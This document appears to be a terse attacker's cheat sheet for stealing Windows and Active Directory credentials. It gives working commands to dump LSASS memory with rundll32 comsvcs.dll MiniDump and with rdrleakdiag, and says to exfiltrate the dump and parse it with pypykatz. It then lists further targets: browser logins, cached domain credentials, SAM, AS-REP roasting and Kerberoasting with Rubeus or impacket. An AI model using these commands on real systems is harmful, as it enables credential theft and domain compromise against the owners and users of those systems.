1. LSASS dump with comsvcs.dll:
   1. Run tasklist and note LSASS PID
   2. Run rundll32.exe comsvcs.dll,MiniDump <lsass PID> <out path> full
   3. Exfiltrate LSASS dump and read with pypykatz lsa minidump lsass.dmp
2. Memory dump with the Windows Resource Leak Diagnostic tool
   1. rdrleakdiag /p [REMOVED] /o CSIDL_PROFILE\\downloads /fullmemdmp /wait 1
3. Stored browser logins
4. Cached Domain Credentials
5. SAM
6. AS-REP Roasting
   1. Rubeus / impacket getNPUsers
7. Kerberoast
   1. Rubeus / impacket